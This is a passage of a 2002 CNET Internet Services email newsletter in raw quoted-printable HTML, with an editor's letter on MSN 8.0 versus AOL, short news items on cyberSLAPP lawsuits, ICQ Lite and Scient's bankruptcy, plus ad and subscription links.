 &gt;One&amp;nbsp;World&amp;nbsp;Hosting&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Cl=
 ick?q=3Db0-NZmfQQJQNJRjfQhdxQMKtNX8PQ9R" &gt;$10&lt;/a&gt;&lt;br&gt;&lt;b&gt;5.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzO4TxFn3YtzSROUJEymxquR" =
 &gt;Superb&amp;nbsp;Internet&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Dda-dT8jQUP7l4Eat93bjsMVKpv3DxsR" &gt;$5&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"ari=
 al, helvetica" size=3D-1&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df=
 0-nv_DQWgaJyDWqcF2fqfAgMcXea9R" &gt;&lt;b&gt;More providers&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;
 &lt;!-- /most popular NEWSLETTER --&gt;
 &lt;br&gt;
 &lt;/td&gt;&lt;td width=3D9 rowspan=3D2&gt;&lt;img src=3D"http://www.cnet.com/i/nl/dd_c.gi=
 f" width=3D9 height=3D60&gt;&lt;br&gt;
 &lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D9 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#ffccoo"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D10&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;table width=3D1 cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#eeeeee"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D410 bgcolor=3D"#ffffff"&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410 bgcolor=
 =3D"#ffffef"&gt;
 =09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09&lt;td width=3D10&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" wi=
 dth=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;td width=3D412&gt;
 =09=09
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" =
 border=3D"0"&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-2"&gt;July 18, 2002&lt;/fon=
 t&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D412&gt;
 =09=09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09=09=09&lt;td width=3D76 align=3Dright&gt;
 =09=09=09=09=09=09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gi=
 f" width=3D66 height=3D86&gt;&lt;br&gt;
 =09=09=09=09=09=09&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#666=
 666"&gt;
 --&lt;A HREF=3D"mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
 Senior editor&lt;br&gt;
 CNET Software and Internet&lt;br&gt;&lt;/font&gt;
 =09=09=09&lt;/td&gt;&lt;td width=3D10&gt; &lt;/td&gt;
 =09=09=09&lt;td&gt;&lt;font face=3D"Arial, Helvetica"&gt;
 =09=09=09&lt;font color=3D"#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 =09=09=09&lt;font size=3D"-1"&gt;
 On the surface, it seems odd that Microsoft and AOL compete with
 one another. After all, while Microsoft is a giant software
 powerhouse, AOL Time Warner is totally different--a giant media
 powerhouse. Nonetheless, they're at it again, working like crazy
 to dominate the ISP space. While AOL is busy renovating the guts
 of upcoming AOL 8.0, which will finally integrate the Netscape
 browser, Microsoft is nipping at its competition's heels with MSN
 8.0. Will Microsoft make enough improvements to finally catch up
 with AOL? It just might. &lt;P&gt;Find out more in our &lt;a href=3D"http://clickthr=
 u.online.com/Click?q=3D05-gDULIG8PCtUn-3efnODtxI8fiiuR" &gt;&lt;B&gt;MSN 8.0 First
 Take&lt;/b&gt;&lt;/a&gt;.
 &lt;P&gt;
 =09=09&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;/table&gt;
 =09=09=09=09&lt;/td&gt;
 =09=09=09=09&lt;td width=3D8&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" =
 width=3D"8" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!--Info Button Bar Web Hosting --&gt;
 &lt;table cellpadding=3D0 width=3D"100%"&gt;
   &lt;tr&gt;
     &lt;td align=3Dcenter&gt;
       &lt;table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
 "&gt;
 =09    &lt;tr&gt;
 =09=09  &lt;td align=3D"center" colspan=3D"5"&gt;&lt;img src=3D"http://www.cnet.com/=
 Ads/Media/Images/ad10-dk.gif" width=3D"120" height=3D"10" alt=3D"advertisem=
 ent"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"middle"&gt;
           &lt;td colspan=3D"5" bgcolor=3D"#999999" height=3D"15" class=3D"w"&gt;&lt;=
 b class=3D"v1"&gt;&lt;font face=3D"verdana,geneva,helvetica" size=3D"-2" color=3D=
 "#ffffff"&gt;&lt;b&gt; Quick links to Services &amp; Prices from these companies&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
 =09=09&lt;tr valign=3D"middle" align=3D"center" bgcolor=3D"#eeeeee"&gt;
 =09=09  &lt;td height=3D"35"&gt; &lt;/td&gt;
 =09=09  &lt;FORM action=3Dhttp://www.cnet.com/cgi-acc/clickthru.acc method=3Dg=
 et&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.dellhost-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservi=
 ces.cnet.com%2fcgi%2fpremier.asp%3fcid%3d1006102&gt;&lt;INPUT type=3Dsubmit value=
 =3D"    DellHost    "&gt;&lt;/td&gt;&lt;/form&gt;&lt;FORM action=3Dhttp://www.cnet.com/cgi-ac=
 c/clickthru.acc method=3Dget&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.aplus-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservices=
 .cnet.com%2fcgi%2fpremier.asp%3fcid%3d1000015&gt; &lt;INPUT type=3Dsubmit value=
 =3D"    Aplus.Net   "&gt;&lt;/td&gt;&lt;/form&gt;
 =09=09  &lt;td&gt; &lt;/td&gt;
 =09=09&lt;/tr&gt;
 =09  &lt;/table&gt;   =20
 =09&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--/Info Button Bar Web Hosting --&gt;
 =09&lt;!-- bottom rule --&gt;
 =09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410&gt;
 =09&lt;tr valign=3Dtop&gt;
 =09=09&lt;td bgcolor=3D"#F7D69C"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=
 =3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;/table&gt;
 =09
 &lt;table border=3D"0" width=3D"100%" cellpadding=3D"10" cellspacing=3D"0"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;font face=3D"Arial, Helvetica"&gt;=09=09=09
 &lt;img src=3D"http://www.cnet.com/i/nl/sw/sub_rev.gif" alt=3D"Review" height=
 =3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;!-- Reviews gif=20
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D93 align=3Dleft&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/082801ie6.jpg" width=3D"8=
 5" height=3D"110" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 End Reviews gif --&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D1a-y6ZkIlXxiC1GbxEd5q0_HZB=
 17WsR" &gt;This week in Internet Services&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Ever heard of a type of lawsuit known as a &lt;i&gt;cyberSLAPP&lt;/i&gt;? We hadn't eit=
 her. A cyberSLAPP case
 typically involves "a person who has posted anonymous criticisms
 of a corporation or public figure on the Internet," according to
 a coalition of privacy groups who are fighting to stop the
 practice. Find out more.
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D2f-hYaFIqnI30GA8_DP26D_8ga=
 ZjMZR" &gt;First Take: MSN 8.0 Beta&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Redmond has been talking up the newest version of MSN for months,
 and now, the proof"s in the pudding. Testers have their hands on
 the beta of MSN 8.0, and so far, this ISP looks and works better
 than past versions. The great No. 8 even has antispam tools and
 improved parental controls. But will MSN topple AOL?
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D44-9nxfIZU9btjouz1EMLKlXBD=
 gnVnR" &gt;First Take: ICQ Lite Alpha&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 One of our biggest beefs with ICQ has always been its bloated
 feature set. Now, the company has released a new lite ICQ that
 sucks up far less system memory than the full-fat version--but at
 what cost? We take an early look.
 &lt;/font&gt;&lt;p&gt;
 &lt;p&gt;
 &lt;!-- Scoop --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_scoop.gif" width=3D150 height=
 =3D19 alt=3D"The Scoop"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEn9utyysBAlpW-B=
 _KMqztrR" &gt;Looking for a new DSL provider?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 The DSL Power Search makes it easier to find the perfect
 broadband provider for your needs. With our search, you can
 identify the DSL providers in your neighborhood, then compare
 prices and plans to make sure your new connection meets with your
 objectives without breaking your budget.
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- End Scoop --&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;!-- this week --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_news.gif" width=3D150 height=3D=
 19 alt=3D"This Week in News"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6e-2aYjIyEG1Du0eDnQA5K-=
 fxuEL5iR" &gt;&lt;b&gt;Don't type that: Yahoo edits e-mail&lt;/b&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Yahoo's filter hunts for words that could activate JavaScript,
 then it replaces them.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D83-U-BXQYJq_Z86j76tuoAA=
 BMMPZ9FR" &gt;Scient files for Chapter 11=20
 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 The Internet consultancy and former highflier is also selling
 certain assets to SBI and Company, a professional services
 firm.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;!-- CNET WEEKLY tip --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_tip.gif" width=3D150 height=3D1=
 9 alt=3D"Tip of the Week"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D99-4mtyQAdF8qRbtHM2H3f2=
 jvrqULcR" &gt;Online undercover!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Unless you observe the proper safety rules, surfing the Net
 could land you in hot water. These simple tips can help.
 &lt;br&gt;
 &lt;/font&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;img src=3D"http://home.cnet.com/i/dp/oncnet.gif" alt=3D"On the CNET Networ=
 k" width=3D"172" height=3D"14" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"410" cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr valign=
 =3Dtop&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dae-jOE6QMB2EScG_0b8-mh=
 e2RYEVuRR" &gt;Tech Trends&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc3-x1yCQJLHNffnW2hZ5zn=
 P-FdWuuFR" &gt;Hardware&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd8-XW73QWLPzz3sd7FmkSW=
 reAgRDc9R" &gt;Software&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ded-jLlvQgV7qkfVpacxv3o=
 rMjEsaQuR" &gt;Shopping&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D02-qia9IljjNkOs117_XGu=
 wrfzJ6nsR" &gt;Downloads&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D18-WhdzI987phpsOKLTiME=
 yR1N6759R" &gt;News&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D2d-OxQyIbKxNljDHcJVdng=
 yV7VDjSuR" &gt;Investing&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D42-rF7cIPKGJAYmjHppz3F=
 7_4EMIryR" &gt;Electronics&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D57-YJIXII0aTAUVbwLF0F_=
 wt9Q9dZPR" &gt;Web Building&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6c-SUL3IuP88_71rM5KQCL=
 5-NPyEdnR" &gt;Help &amp; How-Tos&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D81-z1IaQ-KpQsk9xj1pqfR=
 O9R6BpKcR" &gt;Internet&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D96-pjdWQtdhd9jMy8ejZWS=
 oS2P4JmRR" &gt;Games&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYpMbnCJmMyXydi=
 t0M-0OvFR" &gt;Message Boards&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP1IwPXNSt41H9=
 9K8FZuS9R" &gt;CNET Radio&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL2495R6oGHCu4=
 jNix1DPuR" &gt;Music Center&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- Begin search box --&gt;
 =09&lt;table border=3D"0" cellpadding=3D"1" cellspacing=3D"0" width=3D"90%"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#CCCCCC"&gt;
 =09&lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"100%"&gt;&lt;form m=
 ethod=3D"GET" action=3D"http://www.search.com/redirect"&gt;
 =09&lt;tr align=3Dcenter valign=3Dmiddle bgcolor=3D"#FFFFFF"&gt;
 =09&lt;td height=3D40 align=3Dright nowrap&gt; &lt;/td&gt;
 =09&lt;td class=3D"f"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;Search&lt;/b=
 &gt; &lt;/font&gt;&lt;/td&gt;
 =09&lt;td align=3Dleft&gt;&lt;input type=3D"Text" class=3D"f" name=3D"qt" size=3D"12=
 " maxlength=3D"255"&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;select name=3D"target"&gt;
 =09&lt;option value=3D"http://internet.search.com/search?tag=3Dex.is.lrg.srch.=
 is&amp;sortby=3Dcompany%252Cservice&amp;join=3Dand&amp;keywords=3D%25%25q%25%25" select=
 ed&gt; Internet Services
 =09&lt;option value=3D"http://cnet.search.com/search?edition=3Dcnet&amp;cat=3D103&amp;=
 timeout=3D3&amp;tag=3Dex.ws.sr.srch_top.cnet"&gt;All CNET
 =09&lt;option value=3D"http://www.search.com/search?channel=3D1&amp;tag=3Dex.ws.sr=
 .srch_top.web"&gt;The Web=09
 =09&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;input name=3D'search' type=3D'submit' class=3D'f' value=3D' Go! '&gt;=
 =20
 =09&lt;input type=3D"hidden" name=3D"tt" value=3D"st.sw.8888.sbsr"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;&lt;/form&gt;
 =09&lt;/table&gt;=20
 =09&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;=20
 &lt;!-- End search box --&gt;
 &lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"8" border=3D"=
 0"&gt;&lt;br&gt;
 =09=09&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D599 bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D600 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cnet-news=
 letters@spamassassin.taint.org&amp;brand=3Dcnet'&gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3Deb-Hl7orSD7zUbklPZ=
 pm6XdYcGMt-Ss6RRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cne=
 t-newsletters@spamassassin.taint.org&amp;brand=3Dcnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9QDB2=
 _NPH4bgi4cHr7W6T9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGcDl2zCnMtAV=
 -hDEc2lRbuR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/td=
 &gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIr=
 IWzgptsfEabman8WccrYsR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D3f-4sAEIqMPaOfkZypHcoh57By=
 mNzZR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D54-l6ovIZK3Cj6paAn0O9U4lR0=
 vdknR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-CY-iIoWOSIlwlfPMoAH4OpR=
 zLxrR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D7e-XDXeInp93vORT_Qi6pURwMp=
 opriR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaIqkZV_YBoJ5elUjfr=
